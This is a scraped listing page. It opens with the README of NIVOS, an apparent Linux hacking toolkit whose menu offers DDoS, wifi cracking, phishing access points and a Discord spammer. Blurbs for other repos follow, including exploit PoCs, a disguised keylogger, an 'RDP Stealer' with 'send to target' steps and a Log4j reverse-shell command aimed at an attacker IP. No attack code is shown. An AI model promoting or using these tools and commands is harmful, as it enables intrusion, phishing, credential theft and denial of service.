NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network

Overview

NIVOS

Information Gathering And Scan Tool

Contact : https://discord.gg/qzwBTQvc (Join To NIVOS Community)

NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network. It applies to all linux operating systems. And it is improving every day, new packages are added. Thank You For Using NIVOS :> [NIVOS Created By NIVO Team]

Installation & Setup

pip install os
git clone https://github.com/TheSadError/NIVOS
cd NIVOS
sudo python3 setup.py

Run

cd NIVOS
sudo python3 main.py

Information Of Tool

Error's Discord  : err0r#4018
Januie's Discord : Jan20🇦🇿#6757

Still Upgrading.

[1]     Scan Devices On Your Network                                                     (By Error)
[2]     Scan Networks                                                                    (By Error)
[3]     Crack Network With Mac Adress                                                    (By Error)
[4]     Scan Website Vulnerabilities And Deeply Information Of Website                   (By Error)
[5]     DOS-DDOS Tool                                                                    (By Error)
[6]     Phone Info Tool                                                                  (By Error)
[7]     System INFO                                                                      (By Error)
[8]     Sniffing , Spoofing                                                              (By Error)
[9]     IP Information Gathering                                                         (By Error)
[10]    Email Verifier                                                                   (By Error)
[11]    Port Scanner                                                                     (By Error)
[12]    SQL Injection Scanner                                                            (By Error)
[13]    Discord Spammer                                                                  (By Error)
[14]    Wordlist Generator                                                               (By Error)
[15]    Find Social Media Account With Username                                          (By Error)
[16]    See index.html Source Of Website                                                 (By Error)
[17]    Creating Fake Wifi Acces Point For Phishing                                      (By Error)
[18]    XSS Vulnerebility Scan                                                           (By Error)
[19]    Dedect ARP Spoof                                                                 (By Error)
[20]    Image Meta Data                                                                  (By Error)
[21]    Brute Force ZIP                                                                  (By Error)
[22]    Instagram Bot                                                                    (By Januie)
[23]    Email Extractor                                                                  (By Error)
[24]    Password Generator                                                               (By Januie)
[C]     Credits
[Q]     Quit

[Added Strongest Anonymous DDOS Scripts For Wanters. In python. If you want you can use it. But scripts is not in menu. Just in repo folder.
in ./scripts folder you can find them. These Scripts Are For Educational Purposes! 
]
.
.
.

Donation :

TR05 0006 2000 0280 0009 0525 31
Name : Teymur Ahmetzade
USD Type

Created : April 21 2022 [21.04.2022]

For Educational Purposes

Password-Manager - This app can generate ,save , find and delete passwords.

Password-Manager This app can generate ,save , find and delete passwords. In the StartUp() Function , there are three buttons to choose from : Generat

1 Jan 01, 2022
A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

snowflake-cli Snowflake is a system to defeat internet censorship, made by Tor Project. The system works by volunteers who run the snowflake extension

Guilherme Paixão 6 Jul 14, 2022
Log4Shell Proof of Concept (CVE-2021-44228)

CVE-2021-44228 Log4Shell Proof of Concept (CVE-2021-44228) Make sure to use Java 8 JDK. Java 8 Download Images Credits Casey Dunham - Java Reverse She

Kr0ff 3 Jul 23, 2022
Um keylogger que se disfarça de um app que tira print da tela.

Keylogger_ Um keylogger que se disfarça de um app que tira print da tela. Este programa captura o print da tela e salva ,normalmente, na pasta Picture

Marcus Vinícius Ribeiro Andrade 1 Dec 03, 2021
Cisco RV110w UPnP stack overflow

Cisco RV110W UPnP 0day 分析 前言 最近UPnP比较火,恰好手里有一台Cisco RV110W,在2021年8月份思科官方公布了一个Cisco RV系列关于UPnP的0day,但是具体的细节并没有公布出来。于是想要用手中的设备调试挖掘一下这个漏洞,漏洞的公告可以在官网看到。 准

badmonkey 25 Nov 09, 2022
PrivateRoom - Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin

privateRoom Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin STEPS: Uploa

Divyanshu Kumar 3 Nov 08, 2022
Obfuscate your python code into a string of integers. De-obfuscate also supported.

int-obfuscator Obfuscate your python code into a string of integers. De-obfuscate also supported. How it works: Each printable character gets replaced

6 Nov 13, 2022
一款辅助探测Orderby注入漏洞的BurpSuite插件,Python3编写,适用于上xray等扫描器被ban的场景

OrderbyHunter 一款辅助探测Orderby注入漏洞的BurpSuite插件,Python3编写,适用于上xray等扫描器被ban的场景 1. 支持Get/Post型请求参数的探测,被动探测,对于存在Orderby注入的请求将会在HTTP Histroy里标红 2. 自定义排序参数list

Automne 21 Aug 12, 2022
💣 Bomb Crypto Bot 💣

💣 Bomb Crypto Bot 💣 ⚠️ Warning I am not responsible for any penalties incurred by those who use the bot, use it at your own risk. 📄 Documentation -

Matheus Benites 4 Apr 27, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
Writing and posting code throughout my new journey into python!

bootleg-productions consider this account to be a journal for me to record my progress throughout my python journey feel free to copy codes from this

1 Dec 30, 2021
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://

Michael Tsai 12 Nov 09, 2022
A OSINT tool coded in python

Argus Welcome to Argus, a OSINT tool coded in python. Disclaimer I Am not responsible what you do with the information that is given to you by my tool

Aidan 2 Mar 20, 2022
RDP Stealer

RDP Stealer RDP Stealer by lamp Require Python How To Use Download This Source Extract The Zip File Change webhook url Convert to exe send to target I

Lamp 14 Nov 26, 2022
Docker Compose based system for running remote browsers (including Flash and Java support) connected to web archives

pywb Remote Browsers This repository provides a simple configuration for deploying any pywb with remote browsers provided by OWT/Shepherd Remote Brows

Webrecorder 10 Jul 28, 2022
Brute smb share - Brute force a SMB share

brute_smb_share I wrote this small PoC after bumping into SMB servers where Hydr

devloop 3 Feb 21, 2022
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
AIL LeakFeeder: A Module for AIL Framework that automate the process to feed leaked files automatically to AIL

AIL LeakFeeder: A Module for AIL Framework that automates the process to feed leaked files automatically to AIL, So basically this feeder will help you ingest AIL with your leaked files automatically

ail project 8 May 03, 2022
Open-source jailbreaking tool for many iOS devices

Open-source jailbreaking tool for many iOS devices *Read disclaimer before using this software. checkm8 permanent unpatchable bootrom exploit for hund

6.7k Jan 05, 2023